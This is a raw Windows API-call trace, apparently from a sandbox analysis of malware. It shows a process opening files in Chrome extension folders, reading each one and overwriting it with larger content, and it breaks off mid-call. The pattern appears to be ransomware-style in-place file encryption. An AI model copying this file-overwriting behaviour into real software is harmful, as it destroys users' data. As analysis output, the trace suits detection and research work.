[0166.174] CloseHandle (hObject=0x1d8) returned 1 [0166.174] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0166.175] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0166.175] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xd47 [0166.175] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0166.175] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.175] ReleaseMutex (hMutex=0x168) returned 1 [0166.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="icon_128.png", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0166.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="icon_128.png", cchWideChar=12, lpMultiByteStr=0x1f7346c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icon_128.png", lpUsedDefaultChar=0x0) returned 12 [0166.176] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a4b78, nNumberOfBytesToRead=0xd47, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a4b78*, lpNumberOfBytesRead=0x311f2bc*=0xd47, lpOverlapped=0x0) returned 1 [0166.178] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0166.178] WriteFile (in: hFile=0x1d8, lpBuffer=0x284f968*, nNumberOfBytesToWrite=0x12cf, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x284f968*, lpNumberOfBytesWritten=0x311f2d0*=0x12cf, lpOverlapped=0x0) returned 1 [0166.178] CloseHandle (hObject=0x1d8) returned 1 [0166.179] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0166.180] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0166.180] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xda [0166.180] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0166.180] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.180] ReleaseMutex (hMutex=0x168) returned 1 [0166.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0166.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0166.181] ReadFile (in: hFile=0x1d8, lpBuffer=0x26c4e68, nNumberOfBytesToRead=0xda, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4e68*, lpNumberOfBytesRead=0x311f2bc*=0xda, lpOverlapped=0x0) returned 1 [0166.182] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0166.182] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x662, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x311f2d0*=0x662, lpOverlapped=0x0) returned 1 [0166.182] CloseHandle (hObject=0x1d8) returned 1 [0166.182] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0166.184] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0166.184] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xe2 [0166.184] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0166.184] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.184] ReleaseMutex (hMutex=0x168) returned 1 [0166.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0166.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0166.184] ReadFile (in: hFile=0x1d8, lpBuffer=0x26c4e68, nNumberOfBytesToRead=0xe2, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4e68*, lpNumberOfBytesRead=0x311f2bc*=0xe2, lpOverlapped=0x0) returned 1 [0166.186] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0166.186] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663f68*, nNumberOfBytesToWrite=0x66a, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663f68*, lpNumberOfBytesWritten=0x311f2d0*=0x66a, lpOverlapped=0x0) returned 1 [0166.186] CloseHandle (hObject=0x1d8) returned 1 [0166.186] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0166.187] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0166.188] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xd7 [0166.188] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0166.188] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.188] ReleaseMutex (hMutex=0x168) returned 1 [0166.188] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0166.188] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0166.188] ReadFile (in: hFile=0x1d8, lpBuffer=0x26c4e68, nNumberOfBytesToRead=0xd7, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4e68*, lpNumberOfBytesRead=0x311f2bc*=0xd7, lpOverlapped=0x0) returned 1 [0166.189] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0166.189] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x65f, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x311f2d0*=0x65f, lpOverlapped=0x0) returned 1 [0166.190] CloseHandle (hObject=0x1d8) returned 1 [0166.190] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0166.191] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0166.191] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xd1 [0166.191] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0166.191] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.191] ReleaseMutex (hMutex=0x168) returned 1 [0166.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0166.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0166.192] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ed1918, nNumberOfBytesToRead=0xd1, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed1918*, lpNumberOfBytesRead=0x311f2bc*=0xd1, lpOverlapped=0x0) returned 1 [0166.193] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0166.193] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x659, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x311f2d0*=0x659, lpOverlapped=0x0) returned 1 [0166.193] CloseHandle (hObject=0x1d8) returned 1 [0166.194] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0166.195] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0166.195] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xd8 [0166.195] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0166.195] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.195] ReleaseMutex (hMutex=0x168) returned 1 [0166.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0166.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0166.195] ReadFile (in: hFile=0x1d8, lpBuffer=0x26c4e68, nNumberOfBytesToRead=0xd8, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4e68*, lpNumberOfBytesRead=0x311f2bc*=0xd8, lpOverlapped=0x0) returned 1 [0166.197] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0166.197] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x660, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x311f2d0*=0x660, lpOverlapped=0x0) returned 1 [0166.197] CloseHandle (hObject=0x1d8) returned 1 [0166.198] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0166.199] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0166.199] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x2b56 [0166.199] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0166.199] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.200] ReleaseMutex (hMutex=0x168) returned 1 [0166.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="verified_contents.json", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0166.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="verified_contents.json", cchWideChar=22, lpMultiByteStr=0x1f88c44, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="verified_contents.json", lpUsedDefaultChar=0x0) returned 22 [0166.200] ReadFile (in: hFile=0x1d8, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0167.517] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1b56 [0167.517] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0167.519] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1b56 [0167.519] WriteFile (in: hFile=0x1d8, lpBuffer=0x289d9d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x289d9d8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0167.520] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0167.521] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0167.521] CloseHandle (hObject=0x1d8) returned 1 [0167.521] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0167.523] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0167.523] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x103 [0167.523] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0167.523] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0167.523] ReleaseMutex (hMutex=0x168) returned 1 [0167.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0167.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0167.524] ReadFile (in: hFile=0x1d8, lpBuffer=0x1eea208, nNumberOfBytesToRead=0x103, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eea208*, lpNumberOfBytesRead=0x311f2bc*=0x103, lpOverlapped=0x0) returned 1 [0167.525] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0167.525] WriteFile (in: hFile=0x1d8, lpBuffer=0x3d1ab18*, nNumberOfBytesToWrite=0x68b, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x3d1ab18*, lpNumberOfBytesWritten=0x311f2d0*=0x68b, lpOverlapped=0x0) returned 1 [0167.525] CloseHandle (hObject=0x1d8) returned 1 [0167.525] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0167.527] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0167.527] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xc1 [0167.527] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0167.527] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0167.527] ReleaseMutex (hMutex=0x168) returned 1 [0167.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0167.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0167.527] ReadFile (in: hFile=0x1d8, lpBuffer=0x26a0578, nNumberOfBytesToRead=0xc1, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26a0578*, lpNumberOfBytesRead=0x311f2bc*=0xc1, lpOverlapped=0x0) returned 1 [0167.528] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0167.529] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x649, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x311f2d0*=0x649, lpOverlapped=0x0) returned 1 [0167.529] CloseHandle (hObject=0x1d8) returned 1 [0167.529] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0167.530] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0167.530] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xff [0167.531] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0167.531] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0167.531] ReleaseMutex (hMutex=0x168) returned 1 [0167.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0167.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 